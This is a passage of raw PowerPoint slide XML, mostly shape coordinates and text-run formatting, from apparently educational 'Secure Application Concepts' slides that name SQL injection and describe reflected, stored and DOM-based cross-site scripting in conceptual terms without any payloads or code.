                    <a:pt x="1011876" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966216" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11734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6158610" y="5196916"/>
            <a:ext cx="20002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45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795773" y="3207766"/>
            <a:ext cx="1096645" cy="716915"/>
            <a:chOff x="4795773" y="3207766"/>
            <a:chExt cx="1096645" cy="716915"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802123" y="3214116"/>
              <a:ext cx="1083945" cy="704215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1083945" h="704214">
                  <a:moveTo>
                    <a:pt x="966215" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="117348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="117348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966215" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="117348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966215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802123" y="3214116"/>
              <a:ext cx="1083945" cy="704215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1083945" h="704214">
                  <a:moveTo>
                    <a:pt x="0" y="117348"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9227" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966215" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="117348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966215" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11734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5244465" y="3334639"/>
            <a:ext cx="2000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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>1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67653" y="3222117"/>
            <a:ext cx="5055235" cy="6972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65" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Non-persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="70" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reflected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2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Coded</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E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2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44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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95">
                <a:solidFill>
                  <a:srgbClr val="44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>nk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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tha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2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44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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user</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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m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80">
                <a:solidFill>
                  <a:srgbClr val="44484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55">
                <a:solidFill>
                  <a:srgbClr val="44484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0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95">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cl</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="44484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114">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ck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195819" y="5068316"/>
            <a:ext cx="7030084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50" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-175" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XSS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200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E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50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a: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20">
                <a:solidFill>
                  <a:srgbClr val="44484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0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0">
                <a:solidFill>
                  <a:srgbClr val="44484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50">
                <a:solidFill>
                  <a:srgbClr val="44484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12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44484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da</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="44484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abas</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484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0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th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2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5">
                <a:solidFill>
                  <a:srgbClr val="44484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70">
                <a:solidFill>
                  <a:srgbClr val="44484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0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44484E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55">
                <a:solidFill>
                  <a:srgbClr val="44484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45">
                <a:solidFill>
                  <a:srgbClr val="44484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0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50">
                <a:solidFill>
                  <a:srgbClr val="44484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14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ser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v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="44484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1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cont</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484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nt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367653" y="6914133"/>
            <a:ext cx="7578090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25" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="10" b="1">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>scripts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200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Rendered</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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4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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>pages</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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Document</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(DOM)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22804" y="4780788"/>
            <a:ext cx="2081783" cy="138683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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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28947" y="4258436"/>
            <a:ext cx="50526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5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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Concepts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18864" y="306451"/>
            <a:ext cx="8017509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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Structured</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Query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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Language</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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11195" y="760476"/>
            <a:ext cx="10980419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882385" y="1933193"/>
            <a:ext cx="489966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55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ient</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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de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v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rsu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ser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v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1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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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de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cks: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22653" y="3601973"/>
            <a:ext cx="6341745" cy="2895600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6341745" h="2895600">
                <a:moveTo>
                  <a:pt x="0" y="482600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2208" y="436116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8700" y="390883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19273" y="347104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33724" y="304981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51852" y="264716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73454" y="226510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98329" y="190567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126274" y="157087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157087" y="126274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190567" y="98329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226510" y="73454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264716" y="51852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304981" y="33724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347104" y="19273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390883" y="8700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436116" y="2208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858764" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5905247" y="2208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5950480" y="8700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5994259" y="19273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6036382" y="33724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076647" y="51852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6114853" y="73454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150796" y="98329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6184276" y="126274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6215089" y="157087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6243034" y="190567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6267909" y="226510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6289511" y="264716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6307639" y="304981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6322090" y="347104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6332663" y="390883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6339155" y="436116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6341364" y="482600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6341364" y="2413000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6339155" y="2459483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6332663" y="2504716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6322090" y="2548495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6307639" y="2590618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6289511" y="2630883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6267909" y="2669089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6243034" y="2705032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6215089" y="2738512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6184276" y="2769325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150796" y="2797270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6114853" y="2822145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076647" y="2843747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6036382" y="2861875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5994259" y="2876326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5950480" y="2886899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5905247" y="2893391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858764" y="2895600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482600" y="2895600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436116" y="2893391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390883" y="2886899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347104" y="2876326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304981" y="2861875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264716" y="2843747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226510" y="2822145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190567" y="2797270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157087" y="2769325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126274" y="2738512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98329" y="2705032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73454" y="2669089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51852" y="2630883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33724" y="2590618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19273" y="2548495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8700" y="2504716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2208" y="2459483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2413000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="482600"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="EE63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966341" y="4232046"/>
            <a:ext cx="5303520" cy="15563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4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Inc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udes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sess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play,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RF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,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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>DO</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-400">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>- 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based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XSS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.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di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tha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clien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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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de 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ck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ex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cut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bitra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cod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he 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browser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365997" y="3601973"/>
            <a:ext cx="6278880" cy="2895600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6278880" h="2895600">
                <a:moveTo>
                  <a:pt x="0" y="482600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2208" y="436116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8700" y="390883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19273" y="347104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33724" y="304981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51852" y="264716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73454" y="226510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98329" y="190567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126274" y="157087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157087" y="126274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190567" y="98329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226510" y="73454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264716" y="51852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304981" y="33724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347104" y="19273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390883" y="8700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436116" y="2208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5796280" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5842763" y="2208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887996" y="8700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931775" y="19273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5973898" y="33724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6014163" y="51852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052369" y="73454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6088312" y="98329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6121792" y="126274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6152605" y="157087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6180550" y="190567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6205425" y="226510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6227027" y="264716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6245155" y="304981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6259606" y="347104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6270179" y="390883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6276671" y="436116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6278880" y="482600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6278880" y="2413000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6276671" y="2459483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6270179" y="2504716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6259606" y="2548495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6245155" y="2590618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6227027" y="2630883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6205425" y="2669089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6180550" y="2705032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6152605" y="2738512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6121792" y="2769325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6088312" y="2797270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052369" y="2822145"/>
                </a:lnTo>
